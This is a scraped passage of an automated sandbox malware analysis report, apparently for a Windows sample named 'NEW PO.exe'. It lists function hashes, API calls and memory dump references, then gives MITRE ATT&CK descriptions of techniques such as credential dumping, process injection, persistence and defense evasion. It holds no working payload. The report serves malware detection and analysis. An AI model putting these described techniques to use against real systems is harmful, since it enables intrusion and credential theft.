Function 051B3AF4, Relevance: 1.6, APIs: 1, Instructions: 61fileCOMMON

Download Yara Rule

APIs

MapViewOfFile.KERNELBASE(?,00000004,?,00000001,00000004), ref: 051B43E4

Memory Dump Source

Source File: 00000010.00000002.360082076.00000000051B0000.00000040.00000001.sdmp, Offset: 051B0000, based on PE: false

Similarity

API ID: FileView
String ID:
API String ID: 3314676101-0
Opcode ID: 5e25e2f8a88e8da5438ff481691b219ced3d53e49e590ca1250ec6df89a86d88
Instruction ID: 02d149ac4316460f6ac4de7c5d586aee04abbcc66b9d0cf67f03449b1d3edf0e
Opcode Fuzzy Hash: 5e25e2f8a88e8da5438ff481691b219ced3d53e49e590ca1250ec6df89a86d88
Instruction Fuzzy Hash: CB213671904248DFCB10CF99D488BCEFBF5EB88324F19C45AE909A7261D775A804CF60

Uniqueness

Uniqueness Score: -1.00%

Function 051B435A, Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON

Download Yara Rule

APIs

MapViewOfFile.KERNELBASE(?,00000004,?,00000001,00000004), ref: 051B43E4

Memory Dump Source

Source File: 00000010.00000002.360082076.00000000051B0000.00000040.00000001.sdmp, Offset: 051B0000, based on PE: false

Similarity

API ID: FileView
String ID:
API String ID: 3314676101-0
Opcode ID: 3adf573811207b21d4a74a0e4132010e6e8f284022562e39d1759cde77295358
Instruction ID: 8afe2ccb1635ce1a6d687da8f8c4a062954394a281ae26ebd42f040a35803b73
Opcode Fuzzy Hash: 3adf573811207b21d4a74a0e4132010e6e8f284022562e39d1759cde77295358
Instruction Fuzzy Hash: 852114B5800248DFCB10CF99D988BCEFBF4EB88324F19C45AE919A7261D775A845CF61

Uniqueness

Uniqueness Score: -1.00%

Function 0114B110, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0114BEE9,00000800,00000000,00000000), ref: 0114C0FA

Memory Dump Source

Source File: 00000010.00000002.358966277.0000000001140000.00000040.00000001.sdmp, Offset: 01140000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: cc483128fea3b390581ee2f34fe16460096b823efff96fe7df4d68ad9da4f9a1
Instruction ID: 996fa9b163516402dfd8c9baef78f18d9b739a482bce7e7fdcfec31ec21e7927
Opcode Fuzzy Hash: cc483128fea3b390581ee2f34fe16460096b823efff96fe7df4d68ad9da4f9a1
Instruction Fuzzy Hash: 761124B68002098BDB14CF9AD444BDEFBF4AB88614F14842AE515B7600C375A545CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 0114C08B, Relevance: 1.6, APIs: 1, Instructions: 53libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0114BEE9,00000800,00000000,00000000), ref: 0114C0FA

Memory Dump Source

Source File: 00000010.00000002.358966277.0000000001140000.00000040.00000001.sdmp, Offset: 01140000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: b4f30dee7368d426ed86ec4e21e65cf47b466c1f8d4557b3fa8e0071e881de7e
Instruction ID: 8080df2e77506d567a057ab5f0130b1fc3f7911c29c91ad26f0ed6e0b47b1bf9
Opcode Fuzzy Hash: b4f30dee7368d426ed86ec4e21e65cf47b466c1f8d4557b3fa8e0071e881de7e
Instruction Fuzzy Hash: F31100B68002098FDB14CFAAD484BDEFBF8AB88764F14842AE519B7600C775A545CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 0114B284, Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,FFFFFFF4,?), ref: 0114DF7D

Memory Dump Source

Source File: 00000010.00000002.358966277.0000000001140000.00000040.00000001.sdmp, Offset: 01140000, based on PE: false

Similarity

API ID: LongWindow
String ID:
API String ID: 1378638983-0
Opcode ID: 3f0a34bc4f5041f0cc7ad23247308b83eb803b615e632a01db0fc8d176f120db
Instruction ID: 6286ea5437e57ed81330564401c1b14cdda091fc90703f41f065357ddacf2beb
Opcode Fuzzy Hash: 3f0a34bc4f5041f0cc7ad23247308b83eb803b615e632a01db0fc8d176f120db
Instruction Fuzzy Hash: 381122B58042098FDF20CF99D488BEEBBF8EB58320F10841AE919B7640C374A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0114BE08, Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0114BE6E

Memory Dump Source

Source File: 00000010.00000002.358966277.0000000001140000.00000040.00000001.sdmp, Offset: 01140000, based on PE: false

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 6cd01d781b981c700308d71b88c8ea6d87961bd4dba4b566c7cea027ba56800d
Instruction ID: 3428640ef5e7b6c2261eb25d68dfed073fcab9448bf33b5cf46447aa068ed7b6
Opcode Fuzzy Hash: 6cd01d781b981c700308d71b88c8ea6d87961bd4dba4b566c7cea027ba56800d
Instruction Fuzzy Hash: 881110B6C046098FDB24CFAAD444BDEFBF4EF88624F14842AD529B7600C374A545CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 051B8938, Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(?), ref: 051B8990

Memory Dump Source

Source File: 00000010.00000002.360082076.00000000051B0000.00000040.00000001.sdmp, Offset: 051B0000, based on PE: false

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 6303f19e93abe60a82cbc311a260145e4637136b3eeb7cb8e311f25078f903b8
Instruction ID: 862291d706966fa9b8099c1e815660052643f16fbae403e71617a6c591e0d171
Opcode Fuzzy Hash: 6303f19e93abe60a82cbc311a260145e4637136b3eeb7cb8e311f25078f903b8
Instruction Fuzzy Hash: 121133B18002098FDB10CF99C484BEEBBF8EB88364F14882AD559B7640D778A944CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 051B8930, Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(?), ref: 051B8990

Memory Dump Source

Source File: 00000010.00000002.360082076.00000000051B0000.00000040.00000001.sdmp, Offset: 051B0000, based on PE: false

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 52a12e84eb93b8e1e88e738ab701f2d6a53e5ff7a398875063973460d29f2c11
Instruction ID: ab4bf7504c4c8295fde2022db39e9774b8820743f12735afcc5f96ee48ca1ceb
Opcode Fuzzy Hash: 52a12e84eb93b8e1e88e738ab701f2d6a53e5ff7a398875063973460d29f2c11
Instruction Fuzzy Hash: 8F1152B1800209CFDB10CF99C584BEEBBF4EF88324F14882AD958B7640D338A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 051B8038, Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 051B809D

Memory Dump Source

Source File: 00000010.00000002.360082076.00000000051B0000.00000040.00000001.sdmp, Offset: 051B0000, based on PE: false

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 6fbfdf304d330e3bc74255a14e6294d6a307969d049228d2dca9a03f6ae0a834
Instruction ID: e80e856342c6edbb51c22cf6160ec8383047542045184aab1cd425a534057510
Opcode Fuzzy Hash: 6fbfdf304d330e3bc74255a14e6294d6a307969d049228d2dca9a03f6ae0a834
Instruction Fuzzy Hash: 361103B58003099FDB10CF99D985BDEFBF8EB48364F14841AE919B7640C379AA44CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 051B6224, Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 051B809D

Memory Dump Source

Source File: 00000010.00000002.360082076.00000000051B0000.00000040.00000001.sdmp, Offset: 051B0000, based on PE: false

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: fe7f7cfc040bcfba229565b0f171513e0e71423de690bae0b3cff0bb45b15646
Instruction ID: b74a999292df381aa097a491e1e203eec9ef524113abca05dcc62576209fe342
Opcode Fuzzy Hash: fe7f7cfc040bcfba229565b0f171513e0e71423de690bae0b3cff0bb45b15646
Instruction Fuzzy Hash: 0811F5B58042099FDB20DF99D584BDEBBF8EB48364F14841AE515B7640C3B4A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0114DF18, Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,FFFFFFF4,?), ref: 0114DF7D

Memory Dump Source

Source File: 00000010.00000002.358966277.0000000001140000.00000040.00000001.sdmp, Offset: 01140000, based on PE: false

Similarity

API ID: LongWindow
String ID:
API String ID: 1378638983-0
Opcode ID: dc3a08b31422bc0805c428ab8ba12d42be6093da84715b1a67adc0e4fd5325c7
Instruction ID: af9079e3f571a59295944353c8ac9c7992a562f7c478eed885c152e2d4feeaaa
Opcode Fuzzy Hash: dc3a08b31422bc0805c428ab8ba12d42be6093da84715b1a67adc0e4fd5325c7
Instruction Fuzzy Hash: 081106B58003499FDB10CF99D485BDEFBF8EB58324F24841AE959B7640C374A945CFA1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Description:	Adversaries may move onto systems, possibly those on disconnected or air-gapped networks, by copying malware to removable media and taking advantage of Autorun features when the media is inserted into a system and executes. In the case of Lateral Movement, this may occur through modification of executable files stored on removable media or by copying malware and renaming it to look like a legitimate file to trick users into executing it on a separate system. In the case of Initial Access, this may occur through manual manipulation of the media, modification of systems used to initially format the media, or modification to the media's firmware itself.
Tactics:	Initial Access, Lateral Movement
Data Sources:	Data loss prevention, File monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time. For example, the application shimming feature allows developers to apply fixes to applications (without rewriting code) that were created for Windows XP so that it will work with Windows 10.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.
Tactics:	Credential Access
Data Sources:	File monitoring, Process command-line parameters
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system. Peripheral devices could include auxiliary resources that support a variety of functionalities such as keyboards, printers, cameras, smart card readers, or removable storage. The information may be used to enhance their awareness of the system and network environment or may be used for further actions.
Tactics:	Discovery
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report NEW PO.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Jbx Signature Overview

AV Detection:

Compliance:

Spreading:

Software Vulnerabilities:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

Private

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

Description:	Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.
Tactics:	Discovery
Data Sources:	API monitoring, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre